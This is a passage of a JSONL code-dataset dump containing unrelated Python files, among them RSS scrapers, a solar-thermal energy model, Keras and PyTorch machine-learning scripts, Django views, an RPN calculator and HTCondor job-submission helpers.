% self._filename)\n# time_to_download = randint(5, 10)\n# sleep(time_to_download)\n# print('%s下载完成!耗费了%d秒' % (self._filename, time_to_download))\n#\n#\n# def main():\n# start = time()\n# # download_task('python从入门到放弃.pdf')\n# # download_task('peking Hot.avi')\n# # end = time()\n# # p1 = Thread(target=download_task, args=('pyhton从入门到放弃.pdf', ))\n# # p1.start()\n# # p2 = Thread(target=download_task, args=('peking Hot.avi',))\n# # p2.start()\n# # p1.join()\n# # p2.join()\n# t1 = DownloadTask('pyhton从入门到放弃.pdf')\n# t1.start()\n# t2 = DownloadTask('peking Hot.avi')\n# t2.start()\n# t1.join()\n# t2.join()\n# end = time()\n# print('总共耗费了%.2f秒' % (end - start))\n#\n#\n# if __name__ == '__main__':\n# main()\n\n\nfrom time import sleep\nfrom threading import Thread, Lock\n\n\nclass Account(object):\n\n def __init__(self):\n self._balance = 0\n self._lock = Lock()\n\n def deposit(self, money):\n self._lock.acquire()\n try:\n new_balance = self._balance + money\n sleep(0.01)\n self._balance = new_balance\n finally:\n self._lock.release()\n\n @property\n def balance(self):\n return self._balance\n\n\nclass AddMoneyThread(Thread):\n\n def __init__(self, account, money):\n super().__init__()\n self._account = account\n self._money = money\n\n def run(self):\n self._account.deposit(self._money)\n\n\ndef main():\n account = Account()\n threads = []\n for _ in range(100):\n t = AddMoneyThread(account, 2)\n threads.append(t)\n t.start()\n for t in threads:\n t.join()\n print('账户余额为:¥%d元' % account.balance)\n\n\n# if __name__ == '__main__':\n# main()","sub_path":"5-22/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428363895","text":"#!/usr/bin/env ipython\nimport xml.etree.ElementTree as ET\nfrom StringIO import StringIO \nimport cStringIO ,scraping , nltk , re\nfrom bs4 import BeautifulSoup\nfrom other import *\nimport dateutil.parser\nfrom datetime import 
tzinfo\nimport pytz , time\n\n\n\ndef conversionUTC ( Date ) :\n loc_dt = dateutil.parser.parse( Date)\n try :\n loc_dt = loc_dt.astimezone(pytz.utc).replace( tzinfo = None)\n return loc_dt.isoformat()\n except ValueError :\n tz = pytz.timezone('EST')\n return tz.localize(loc_dt).astimezone(pytz.utc).replace( tzinfo = None).isoformat()\n\ndef isodate_to_epoch( date):\n pattern = '%Y-%m-%dT%H:%M:%S'\n epoch = int(time.mktime(time.strptime(date, pattern)))\n return epoch\n\n\nclass initialisation :\n def __init__ (self, url ) :\n self.url = url\n self.list = [ ]\n self.m = scraping.Scraping(url)\n self.data = self.m.mechanize_scraping()\n self.tree = ET.parse (cStringIO.StringIO(self.data))\n self.soup = BeautifulSoup (self.data )\n\nclass rssInitialisation :\n def __init__( self , xmltree , string ) :\n self.epoch_pubdate = isodate_to_epoch(conversionUTC(xmltree.find('pubDate').text))\n self.source = string \n self.title = xmltree.find('title').text.encode('ascii', 'xmlcharrefreplace')\n self.link = xmltree.find('link').text.encode('ascii', 'xmlcharrefreplace')\n self.isodate = conversionUTC(xmltree.find('pubDate').text)\n if xmltree.find('description').text != None :\n self.description = xmltree.find('description').text.encode('ascii','xmlcharrefreplace')\n else :\n self.description = None\n\nclass tvGuideRss(initialisation) :\n def __init__ (self ,url ,epoch=None) :\n initialisation.__init__ ( self, url )\n self.epoch = epoch\n\n def returning_text (self , string ) :\n soup =BeautifulSoup (string)\n textList = [ ]\n if soup.findAll('p') != [] :\n for e in soup.findAll ('p') :\n textList.append(e.text.encode('ascii','xmlcharrefreplace') +'\\n' )\n return \"\".join(textList)\n else :\n return None\n\n def rss (self ) :\n for child in self.tree.getroot() : # channel tag\n for f in child.findall('item'):\n instance = rssInitialisation ( f , 'tvguide.com' )\n if ( instance.epoch_pubdate > self.epoch ):\n list = []\n list.append( instance.epoch_pubdate)\n list.append ( 
instance.source)\n list.append( instance.title)\n list.append( instance.link)\n list.append(instance.isodate)\n string = f.find('.//{http://purl.org/rss/1.0/modules/content/}encoded').text\n list.append(self.returning_text(string)[:-42])\n if f.find('.//{http://search.yahoo.com/mrss/}content') != None :\n list.append(f.find('.//{http://search.yahoo.com/mrss/}content').get('url'))\n else :\n list.append (None ) \n self.list.append(list)\n return self.list\n\nclass tvLineRss(initialisation) :\n def __init__ (self ,url ,epoch=None) :\n initialisation.__init__ ( self, url )\n self.epoch = epoch\n\n def making_soup (self ,string ) :\n return BeautifulSoup (string )\n\n def returning_image ( self, string ) :\n return self.making_soup(string).img.get('src')\n\n def returning_text (self , string ) :\n soup =BeautifulSoup (string)\n textList = [ ]\n if soup.findAll('p') != [] :\n for e in soup.findAll ('p') :\n textList.append(e.text.encode('ascii','xmlcharrefreplace') +'\\n' )\n return \"\".join(textList)\n else :\n return None\n\n def rss (self ) :\n for child in self.tree.getroot() : # channel tag\n for f in child.findall('item'):\n instance = rssInitialisation ( f , 'tvline.com' )\n if ( instance.epoch_pubdate > self.epoch ):\n list = []\n list.append( instance.epoch_pubdate)\n list.append ( instance.source)\n list.append( instance.title)\n list.append( instance.link)\n list.append(instance.isodate)\n string = f.find('.//{http://purl.org/rss/1.0/modules/content/}encoded').text\n list.append(self.returning_text(string))\n if ('.//{http://search.yahoo.com/mrss/}thumbnail') is not None :\n list.append(f.find('.//{http://search.yahoo.com/mrss/}thumbnail').get('url'))\n else :\n list.append (None)\n self.list.append(list)\n return self.list\n\n\n\nclass indieWireTvRss ( initialisation) :\n def __init__ (self ,url ,epoch=None) :\n initialisation.__init__ ( self, url )\n self.epoch = epoch\n\n def rss (self ) :\n for child in self.tree.getroot() : # channel tag\n for f in 
class rss_list:
    """Pick and run the RSS reader matching a feed name."""

    def __init__(self, string, collection):
        self.string = string          # feed name, e.g. 'tvLine'
        self.collection = collection  # storage backend handed to epochTime
        self.epochstring = self.string + 'epoch'

    def deciding_web(self):
        """Run the reader for self.string; return its rows, or None if unknown."""
        # feed name -> (reader class, feed URL)
        feeds = {
            'indieWireTv': (indieWireTvRss, 'http://feeds.feedburner.com/IndiewireTelevision'),
            'tvLine': (tvLineRss, 'http://tvline.com/feed/'),
            'tvGuide': (tvGuideRss, 'http://rss.tvguide.com/breakingnews'),
        }
        if self.string not in feeds:
            return None
        reader_cls, url = feeds[self.string]
        tracker = epochTime(self.collection, self.epochstring)
        reader = reader_cls(url, epoch=tracker.last_epoch())
        return reader.rss()
flat_plate_collector_example():\n # Set paths\n base_path = os.path.dirname(os.path.abspath(os.path.join(__file__)))\n data_path = os.path.join(base_path, 'data')\n results_path = os.path.join(base_path, 'results')\n if not os.path.exists(results_path):\n os.mkdir(results_path)\n\n # Parameters for the precalculation\n periods = 48\n latitude = 52.2443\n longitude = 10.5594\n collector_tilt = 10\n collector_azimuth = 20\n a_1 = 1.7\n a_2 = 0.016\n eta_0 = 0.73\n temp_collector_inlet = 20\n delta_temp_n = 10\n\n # Read input data\n input_data = pd.read_csv(os.path.join(data_path, 'data_flat_collector.csv')).head(periods)\n input_data['Datum'] = pd.to_datetime(input_data['Datum'])\n input_data.set_index('Datum', inplace=True)\n input_data.index = input_data.index.tz_localize(tz='Europe/Berlin')\n input_data = input_data.asfreq('H')\n\n demand_df = pd.read_csv(\n os.path.join(base_path, 'data', 'heat_demand.csv'),\n sep=','\n )\n demand = list(demand_df['heat_demand'].iloc[:periods])\n\n # Precalculation\n # - calculate global irradiance on the collector area\n # and collector efficiency depending on the\n # temperature difference -\n precalc_data = flat_plate_precalc(\n latitude,\n longitude,\n collector_tilt,\n collector_azimuth,\n eta_0,\n a_1,\n a_2,\n temp_collector_inlet,\n delta_temp_n,\n irradiance_global=input_data['global_horizontal_W_m2'],\n irradiance_diffuse=input_data['diffuse_horizontal_W_m2'],\n temp_amb=input_data['temp_amb'],\n )\n\n precalc_data.to_csv(\n os.path.join(results_path, 'flat_plate_precalcs.csv'),\n sep=';'\n )\n\n\n # regular oemof system #\n\n # Parameters for the energy system\n peripheral_losses = 0.05\n elec_consumption = 0.02\n backup_costs = 40\n costs_storage = economics.annuity(20, 20, 0.06)\n costs_electricity = 1000\n storage_loss_rate = 0.001\n conversion_storage = 0.98\n size_collector = 10 # m2\n\n # busses\n bth = solph.Bus(label='thermal')\n bel = solph.Bus(label='electricity')\n bcol = solph.Bus(label='solar')\n\n # 
source for collector heat.\n # - actual_value is the precalculated collector heat -\n collector_heat = solph.components.Source(\n label='collector_heat',\n outputs={\n bcol: solph.Flow(\n fix=precalc_data['collectors_heat'],\n nominal_value=size_collector,\n )\n },\n )\n\n # sources and sinks\n el_grid = solph.components.Source(\n label='grid', outputs={bel: solph.Flow(variable_costs=costs_electricity)}\n )\n\n backup = solph.components.Source(\n label='backup', outputs={bth: solph.Flow(variable_costs=backup_costs)}\n )\n\n consumer = solph.components.Sink(\n label='demand',\n inputs={bth: solph.Flow(fix=demand, nominal_value=1)},\n )\n\n collector_excess_heat = solph.components.Sink(\n label='collector_excess_heat', inputs={bcol: solph.Flow()}\n )\n\n # transformer and storage\n collector = solph.components.Transformer(\n label='collector',\n inputs={bcol: solph.Flow(), bel: solph.Flow()},\n outputs={bth: solph.Flow()},\n conversion_factors={\n bcol: 1,\n bel: elec_consumption * (1 - peripheral_losses),\n bth: 1 - peripheral_losses\n },\n )\n\n storage = solph.components.GenericStorage(\n label='storage',\n inputs={bth: solph.Flow()},\n outputs={bth: solph.Flow()},\n loss_rate=storage_loss_rate,\n inflow_conversion_factor=conversion_storage,\n outflow_conversion_factor=conversion_storage,\n investment=solph.Investment(ep_costs=costs_storage),\n )\n\n # Build the system and solve the problem\n date_time_index = input_data.index\n energysystem = solph.EnergySystem(timeindex=date_time_index)\n\n energysystem.add(\n bth,\n bcol,\n bel,\n collector_heat,\n el_grid,\n backup,\n consumer,\n collector_excess_heat,\n storage,\n collector,\n )\n\n # Create and solve the optimization model\n model = solph.Model(energysystem)\n model.solve(solver='cbc', solve_kwargs={'tee': True})\n\n # Get results\n results = solph.processing.results(model)\n\n electricity_bus = solph.views.node(results, 'electricity')['sequences']\n thermal_bus = solph.views.node(results, 
'thermal')['sequences']\n solar_bus = solph.views.node(results, 'solar')['sequences']\n df = pd.merge(\n pd.merge(electricity_bus, thermal_bus, left_index=True, right_index=True),\n solar_bus, left_index=True, right_index=True)\n df.to_csv(os.path.join(results_path, 'flat_plate_results.csv'))\n\n # Example plot\n plot_collector_heat(precalc_data, periods, eta_0)\n\n\nif __name__ == \"__main__\":\n flat_plate_collector_example()\n","sub_path":"examples/solar_thermal_collector/flat_plate_collector.py","file_name":"flat_plate_collector.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"550932838","text":"import cPickle as pickle\nfrom nolearn.lasagne import NeuralNet\nimport numpy as np\nimport matplotlib.pyplot as pyplot\n\ndef load_net(fname):\n\treturn pickle.load(open(fname, 'rb'))\n\nnet = load_net('net.pickle')\n\ntrain_loss = np.array([i[\"train_loss\"] for i in net.train_history_])\nvalid_loss = np.array([i[\"valid_loss\"] for i in net.train_history_])\npyplot.plot(train_loss[1:], linewidth=3, label=\"train\")\npyplot.plot(valid_loss[1:], linewidth=3, label=\"valid\")\npyplot.grid()\npyplot.legend()\npyplot.xlabel(\"epoch\")\npyplot.ylabel(\"loss\")\n# pyplot.ylim(1e-3, 1e-2)\npyplot.yscale(\"log\")\npyplot.show()\n","sub_path":"bogo/info_from_net.py","file_name":"info_from_net.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"362276896","text":"\n\nfrom xai.brain.wordbase.nouns._lad import _LAD\n\n#calss header\nclass _LADS(_LAD, ):\n\tdef __init__(self,): \n\t\t_LAD.__init__(self)\n\t\tself.name = \"LADS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"lad\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_lads.py","file_name":"_lads.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"90521468","text":"file=open(\"B-large.in\")\r\nk=file.readline()\r\na=int(k[:-1])\r\nw=open(\"output.txt\",\"w\")\r\nfor num in range(a):\r\n k=int(file.readline()[:-1])\r\n dic={}\r\n for i in range((2*k-1)):\r\n line=file.readline()\r\n while True:\r\n n=line.find(\" \")\r\n if n==-1:\r\n pp=int(line[:])\r\n if pp in dic:\r\n dic[pp]+=1\r\n else:\r\n dic[pp]=1\r\n break\r\n else:\r\n a+=1\r\n pp=int(line[0:n])\r\n if pp in dic:\r\n dic[pp]+=1\r\n else:\r\n dic[pp]=1\r\n line=line[n+1:]\r\n lst=[]\r\n for i in dic:\r\n if dic[i]%2==1:\r\n lst.append(i)\r\n lst.sort()\r\n ans=\"\"\r\n for i in lst:\r\n ans+=\" \"+str(i)\r\n s=\"case #\"+str(num+1)+\":\"+ans+\"\\n\"\r\n w.write(s)\r\nw.close()\r\n \r\n","sub_path":"codes/CodeJamCrawler/16_1_2/yumou/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"410196414","text":"a = input(\"甲方的數字:\").split()\nb = input(\"乙方的數字:\").split()\ntmp = 0\nresult = [\"和\",\"贏\",\"輸\"]\nlist1 = []\nfor i in range(len(a)):\n if a[i]>b[i]:\n tmp += 1\n list1.append(tmp)\n elif a[i] 2:\n\tmd.miscellaneous.name = os.path.basename(inspect.stack()[2][1]).split('.')[0]\n","sub_path":"trunk/test/Par/Pig.py","file_name":"Pig.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"422824430","text":"# -*- coding:utf-8 -*-\n# @Author:pgzhang\n\nfrom keras.utils import to_categorical\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras import backend as K\nfrom keras.preprocessing.text import Tokenizer\nfrom numpy import array\nimport numpy as np\nimport os\nfrom PIL import Image\nimport utils\nfrom 
def img_preprocess(img_path: str, img_size: tuple = INPUT_IMG_SIZE) -> np.array:
    """Load an image and preprocess it for the network.

    The image is forced to RGB, resized to ``img_size`` (height, width)
    if needed, converted to a float array, flipped RGB->BGR, and
    mean-centred with the per-channel means [103.939, 116.779, 123.68].
    """
    picture = Image.open(img_path)
    if picture.mode != 'RGB':
        picture = picture.convert('RGB')
    target_size = (img_size[1], img_size[0])  # PIL uses (width, height)
    if picture.size != target_size:
        picture = picture.resize(target_size, Image.NEAREST)
    pixels = np.asarray(picture, dtype=K.floatx())
    pixels = pixels[..., ::-1]  # RGB -> BGR
    # Subtract the per-channel means (BGR order).
    for channel, channel_mean in enumerate([103.939, 116.779, 123.68]):
        pixels[..., channel] -= channel_mean
    return pixels
[[img_input,seq_input],output]\n\n\n\n\n\n\n","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"512242232","text":"import spidev, time\nimport RPi.GPIO as GPIO\n\nled = 18\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(led,GPIO.OUT)\nspi = spidev.SpiDev()\nspi.open(0,0)\nspi.max_speed_hz=1350000\n\ndef analog_read(channel):\n r = spi.xfer2([1, (8+channel) << 4,0])\n adc_out = ((r[1]&3)<<8)+r[2]\n return adc_out\n\nwhile True:\n reading = analog_read(1)\n voltage = reading * 5.0/1024\n print(\"Reading=%d\\tVoltage=%f\"%(reading, voltage))\n time.sleep(1)\n if reading > 5 :\n GPIO.output(led, GPIO.HIGH)\n print(\"LED ON\")\n else :\n GPIO.output(led, GPIO.LOW)\n print(\"LED OFF\")\n\n","sub_path":"raspberry/SensorControl/LightSensorRead_LED_ON.py","file_name":"LightSensorRead_LED_ON.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"127464189","text":"\n\n\n\n# coding: utf-8\n\n'''\n\tCodded By : \n\n █ █░ ██▓ ██▓ ▓█████▄ ▒█████ ███▄ █ ██▓ ▒█████ ███▄ █ \n▓█░ █ ░█░▓██▒▓██▒ ▒██▀ ██▌▒██▒ ██▒ ██ ▀█ █ ▓██▒▒██▒ ██▒ ██ ▀█ █ \n▒█░ █ ░█ ▒██▒▒██░ ░██ █▌▒██░ ██▒▓██ ▀█ ██▒▒██▒▒██░ ██▒▓██ ▀█ ██▒\n░█░ █ ░█ ░██░▒██░ ░▓█▄ ▌▒██ ██░▓██▒ ▐▌██▒░██░▒██ ██░▓██▒ ▐▌██▒\n░░██▒██▓ ░██░░██████▒░▒████▓ ░ ████▓▒░▒██░ ▓██░░██░░ ████▓▒░▒██░ ▓██\n\n\n\n --------------------------------------------\n| Position Classifier\n| -------------------------------------------\n| predict and save positions using\n| a pre-trained model.\n|\n|\n|\n| self.model : classifier pre-trained model\n| self.__save : save prediction on input data into a csv file\n| self.__load : load pre-trained classifier model\n| self.predict : predict output on input data\n| self.__call__ \t\t\t : make a prediction on a input data\n|\n|\n|\n\n\n'''\n\n\nfrom sklearn import 
preprocessing\nfrom ._nn import Position \nimport matplotlib.pyplot as plt\nimport sys\nimport os\nimport pickle\nimport pathlib\nimport pandas as pd\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\n\n\nclass predictor:\n\tdef __init__(self, **model_conf):\n\t\tself.__model_path = model_conf[\"path\"]\n\t\tself.__positions = model_conf[\"positions\"]\n\t\tself.__data_type = model_conf[\"data_type\"]\n\t\tself.__input_features = model_conf[\"features\"][\"in\"]\n\t\tself.__output_features = model_conf[\"features\"][\"out\"]\n\t\tself.__input_data = None\n\t\tself.model = None\n\n\t\tcuda = torch.cuda.is_available() if model_conf[\"device\"] is 'cuda' else None\n\t\tself.__device = torch.device(\"cuda\" if cuda else \"cpu\")\n\t\ttorch.backends.cudnn.benchmark = True\n\n\n\t\tif os.path.exists(self.__model_path):\n\t\t\tprint(f\"\\n________found existing pre-trained classifier model trained on {self.__data_type} data for prediction________\\n\")\n\t\t\tself.__load()\n\t\telse:\n\t\t\tprint(f\"\\t➢ something went wrong with loading pre-trained classifier model, please make sure there is one at {self.__model_path}\")\n\t\t\tsys.exit(1)\n\n\n\tdef __load(self):\n\t\ttry:\n\t\t\tcheckpoint = torch.load(self.__model_path)\n\t\t\tprint(f\"\\t➢ loaded pre-trained model from {self.__model_path}\\n\")\n\t\texcept IOError:\n\t\t\tprint(f\"\\t➢ can't load pre-trained model from : {self.__model_path}\\n\")\n\n\n\t\tself.model = Position(input_neurons=self.__input_features, output_neurons=self.__output_features).to(self.__device)\n\t\tself.model.load_state_dict(checkpoint['model_state_dict'])\n\t\tself.optimizer = torch.optim.SGD(self.model.parameters(), lr=1e-3, momentum=0.9)\n\t\tself.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\t\tself.epoch = checkpoint['epoch']\n\t\tself.training_loss = checkpoint['training_loss']\n\t\tself.training_best_accuracy = checkpoint['training_best_accuracy']\n\t\tself.loss_tracker = 
checkpoint['loss_tracker']\n\t\tself.model.eval()\n\n\n\tdef __save(self, predictions):\n\t\tclassifier_obj_path = os.path.dirname(os.path.abspath(__file__))+f'/utils/classifier.obj'\n\t\tcurr_dir = os.path.dirname(os.path.abspath(__file__))\n\t\tinput_data = os.path.abspath(curr_dir + f\"/../../server/dataset/input_data.csv\")\n\t\tinput_data_classified = os.path.abspath(curr_dir + f\"/../../server/dataset/input_data_classified_positions_using-pre-trained_model_on-{self.__data_type}.csv\")\n\t\tnumpy_predictions = predictions.detach().numpy()\n\t\tDf = pd.read_csv(input_data)\n\t\tDf['position'] = np.array(list(self.__positions[pred] for pred in numpy_predictions))\n\t\tDf.to_csv(input_data_classified, index=False)\n\t\tprint(f\"\\t➢ new dataset saved in {input_data_classified}\\n\")\n\t\twith open(classifier_obj_path, \"wb\") as classifier_file:\n\t\t\tpickle.dump(self, classifier_file)\n\t\tprint(f\"\\t➢ classifier object saved in {classifier_obj_path}\\n\")\n\n\n\tdef __predict(self):\n\t\tif self.__input_data is not None:\n\t\t\tprint(f\"\\n________predicting on input data using pre-trained classifier on {self.__device}________\\n\")\n\t\t\t_input = Variable(torch.from_numpy(self.__input_data), requires_grad=False)\n\t\t\t_input = _input.to(self.__device)\n\t\t\toutputs = self.model(_input.float())\n\t\t\tpredictions = outputs.argmax(dim=1)\n\t\t\tif len(predictions) == 1: # we just classified only one user which is done through /user/classify/position route and we are returning the result back to the route\n\t\t\t\tposition = np.array(list(self.__positions[pred] for pred in predictions.detach().numpy()))\n\t\t\t\treturn position, self.__data_type # we need data type for saving predicted position into its related column\n\t\t\telse: # we just classified a bunch of input data using a csv file and we just saved the results into a csv file to insert them in db using /users/add/positions\n\t\t\t\tself.__save(predictions)\n\t\telse:\n\t\t\tprint(f\"[?] 
def books_view(request):
    """Render the full list of books ordered by publication date."""
    books = Book.objects.order_by('pub_date')
    return render(request, 'books/books_list.html', {'books': books})


def date_books(request, pub_date):
    """Render the book published on ``pub_date`` with prev/next navigation.

    The prev/next links fall back to the opposite end of the date range
    when there is no earlier (or later) book.
    """
    # One ordered queryset instead of the original three identical ones;
    # `is None` replaces the non-idiomatic `== None` comparisons.
    ordered = Book.objects.order_by('pub_date')
    book = ordered.get(pub_date=pub_date)

    date_next = ordered.filter(pub_date__gt=pub_date).first()
    if date_next is None:  # no later book: use the earliest earlier one
        date_next = ordered.filter(pub_date__lt=pub_date).first()
    date_prev = ordered.filter(pub_date__lt=pub_date).last()
    if date_prev is None:  # no earlier book: use the latest later one
        date_prev = ordered.filter(pub_date__gt=pub_date).last()

    return render(request, 'books/book.html', context={
        'book': book,
        'prev': date_prev.pub_date,
        'next': date_next.pub_date,
    })
#!/usr/bin/env python
# coding=utf-8
"""Symbolic rational arithmetic behind an RPN calculator (phenny .rc command).

A Value is a sum of terms; each term is a Fraction multiplier times a
product of base**exponent factors, where bases are variable-name strings
and exponents are themselves Values.
"""

from fractions import Fraction
from decimal import Decimal

# meh, just don't mutate it
class idict(dict):
	"""A dict usable as a dict key. Treat instances as immutable."""
	def __hash__(self):
		# BUG FIX: hashing used sorted(self.items()); when keys are idicts
		# (as in Value.data) sorting raises TypeError on Python 3. A
		# frozenset is order-independent and needs no orderable keys.
		return hash(frozenset(self.items()))

class Value:
	# data :: idict { part (idict {name: exponent Value}) -> Fraction }
	# value = sum [ mult * product [ base^exp | base->exp <- part ] | part->mult <- data ]
	def __init__(self, data):
		self.data = data

	def __eq__(self, other):
		return other and self.data == other.data

	def __ne__(self, other):
		return not other or self.data != other.data

	def __hash__(self):
		return hash(self.data)

	def __add__(a, b):
		# Merge term dicts, summing multipliers and dropping cancelled terms.
		out = dict(a.data)
		for bpart, bmult in b.data.items():
			if bpart in out:
				out[bpart] += bmult
				if out[bpart] == 0:
					del out[bpart]
			else:
				out[bpart] = bmult
		return Value(idict(out))

	def __mul__(a, b):
		# Distribute: multiply every term of a with every term of b,
		# adding exponents of shared bases.
		out = zero
		for apart, amult in a.data.items():
			for bpart, bmult in b.data.items():
				newpart = dict(apart)
				for base, exp in bpart.items():
					if base in newpart:
						newpart[base] += exp
						if newpart[base] == zero:
							del newpart[base]
					else:
						newpart[base] = exp
				out += Value({ idict(newpart): amult*bmult })
		return out

	def __sub__(a, b):
		# BUG FIX: this used to compute b - a, relying on the RPN
		# evaluator's reversed pop order. The operator now has standard
		# semantics; parsetok() supplies the RPN operand order instead.
		return a + b.negate()

	def __truediv__(a, b):
		# BUG FIX: likewise, this used to compute b / a.
		return a * b.invert()

	def negate(a):
		out = dict(a.data)
		for part in out.keys():
			out[part] *= -1
		return Value(idict(out))

	def invert(a):
		# 1/x: negate every exponent and invert every multiplier.
		out = {}
		for part, mult in a.data.items():
			inv_part = {}
			for base, exp in part.items():
				inv_part[base] = exp.negate()
			out[idict(inv_part)] = 1/mult
		return Value(idict(out))

	def tree(self):
		"""Render as a ("op", [operands]) expression tree with Fraction leaves."""
		out = None
		for part, mult in self.data.items():
			term = mult
			for base, exp in part.items():
				factor = base
				if exp != one:
					factor = ("^", [factor, exp.tree()])
				term = ("*", [term, factor])
			if out is None:
				out = term
			else:
				out = ("+", [out, term])
		if out is None:
			out = Fraction(0)
		return out

	def __repr__(self):
		return "Value(" + str(self.data) + ")"

	def __str__(self):
		return self.__repr__()

def makeValue(v):
	"""Lift an int or token string into a Value (digit strings become numbers)."""
	if isinstance(v, int):
		return zero if v == 0 else Value(idict({ idict({}): Fraction(v) }))
	if all(map(str.isdigit, v)):
		return makeValue(int(v))
	return Value(idict({ idict({ str(v): one }): Fraction(1) }))

# defined simply for convenience; other such objects might exist—they'll be equal to these ones .. hopefully
zero = Value(idict({}))
one = makeValue(1)

def binop(fn):
	"""Stack op: pop the top two values and push fn(top, second)."""
	return lambda s: s.append(fn(s.pop(), s.pop()))

def val(v):
	"""Stack op: push a constant value."""
	return lambda s: s.append(v)

def parsetok(s):
	"""Map one RPN token to a stack operation.

	binop hands operands as (top, second); in RPN `second` is the left
	operand, so the non-commutative operators are order-corrected here
	(the old code instead defined __sub__/__truediv__ backwards).
	"""
	if s == "*": return binop(Value.__mul__)
	if s == "/": return binop(lambda top, second: second / top)
	if s == "+": return binop(Value.__add__)
	if s == "-": return binop(lambda top, second: second - top)
	return val(makeValue(s))

def evalrpn(s):
	"""Evaluate an RPN token iterable (or space-separated string); return the stack."""
	if isinstance(s, str):
		s = filter(None, s.split(" "))
	stack = []
	for op in map(parsetok, s):
		op(stack)
	return stack

def treetorpn(t):
	"""Flatten an expression tree back into a list of RPN tokens."""
	if isinstance(t, Fraction):
		if t.denominator == 1:
			return [str(t.numerator)]
		# Non-integer rationals render as "num den /".
		return [str(t.numerator), str(t.denominator), "/"]
	if isinstance(t, str):
		return [t]
	op, operands = t
	return sum(map(treetorpn, operands), []) + [op]

def compose(fns):
	"""Compose a list of unary functions, applied right to left."""
	out = lambda x: x
	for fn in reversed(fns):
		out = compose2(fn, out)
	return out

def compose2(a, b):
	return lambda c: a(b(c))

def runrpn(input):
	"""Evaluate an RPN string and render each resulting stack entry back to RPN."""
	return "; ".join(map(compose([" ".join, treetorpn, Value.tree]), evalrpn(input)))

def rc(phenny, input):
	text = input.group(2)
	if isinstance(text, bytes):
		# Legacy (py2) callers handed us UTF-8 bytes; runrpn works on str.
		text = text.decode("utf-8")
	phenny.say("rc: " + runrpn(text))
rc.commands = ['rc']
rc.example = '.rc 5 3 +'
import subprocess

# Submits one HTCondor analysis job per reconstruction iteration: each job
# waits for /var/log/All_done.txt, then runs plotAll_simoLenghtXelongation.py
# on all recon files of that iteration.

# scanRmin-Ws
base_dir='/data1/maldera/IXPE_work/rec_optimization/scanRmin-Ws/'
max_iter= 132+1

# Shell-script fragments wrapped around the actual command: the generated
# job polls for the "All_done" marker file every 30 s before running.
stringa1='#!/bin/bash \n \nFILE="/var/log/All_done.txt"\nwhile true \ndo \n if [ -f $FILE ]; then \n echo "File $FILE exists... let\'s go!" \n'
stringa2='\n break \n \n else \n echo "File $FILE does not exist... waiting 30 secs" \n sleep 30\n fi \ndone \n'


def run_command(cmd):
    """Echo and run *cmd* through the shell.

    NOTE(review): shell=True with string-built commands is shell-injection
    prone; acceptable here only because every path is hard-coded.
    """
    print('going to run: ', cmd)
    subprocess.call(cmd, shell=True)


def crea_jobScript(command_string, work_dir):
    """Write work_dir/job_script_analisi.sh wrapping *command_string*
    between the wait-for-marker fragments, and make it executable."""
    nomeFile = work_dir + '/job_script_analisi.sh'
    # Context manager replaces the original manual open/close so the
    # handle is released even if a write fails.
    with open(nomeFile, 'w') as miofile:
        miofile.write(stringa1)
        miofile.write(command_string)  # the actual analysis command
        miofile.write(stringa2)
    run_command('chmod a+x ' + nomeFile)


def lancia_jobHtc(work_dir, cmd_string):
    """Stage the condor submit file, create the job script and submit it."""
    run_command('cp /home/users/maldera/IXPE/ixpeTO/scanRecPars/analize/submit_analisi ' + work_dir + '/.')
    crea_jobScript(cmd_string, work_dir)
    run_command('cd ' + work_dir + ' && condor_submit submit_analisi')


if __name__ == '__main__':
    # Guarding the driver loop keeps imports side-effect free; running the
    # file as a script behaves exactly as before.
    n_iter = 1
    for i in range(1, max_iter):
        out_dir = '/data1/maldera/IXPE_work/rec_optimization/scanRmin-Ws/LxEbins/rec_' + str(i) + '/'
        work_dir = out_dir
        run_command('mkdir -p ' + work_dir)

        run_command('cp ' + base_dir + '*/' + str(i) + '/config_simo.txt ' + out_dir + '.')

        files_string = base_dir + '*/' + str(i) + '/*_recon.fits'
        print("file_string = ", files_string)

        cmd_string = ' python /home/users/maldera/IXPE/ixpeTO/scanRecPars/analize/plotAll_simoLenghtXelongation.py ' + files_string + ' -o ' + out_dir
        print("cmd=", cmd_string)

        lancia_jobHtc(work_dir, cmd_string)
"""Sampler"""
_sampler = ["MetropolisHop"]  # ["MetropolisLocal","MetropolisHop"]
_d_max = [5]


"""VMC"""
_discarded_samples = [500]
_discarded_samples_on_init = [0]
_method = ["Gd"]  # ["Gd","Sr"]
_n_samples = [2000]
_diag_shift = [0.01]
_use_iterative = [False]  # [False,True]
_use_cholesky = [False]  # [False,True]
_target = ["energy"]
_n_iter = [100]


def create_ip():
    """Create one .ip JSON input file per parameter combination.

    Iterates the cartesian product of every parameter list declared
    above, builds the netket-style input dict, and writes it to
    ``directory``; a matching .log name is reserved by bumping a counter
    until neither the .ip nor the .log file exists.
    """
    all_comb = itertools.product(_L, _J, _sampler, _BondDim, _SymmetryPeriod, _SigmaRand, _Diagonal,
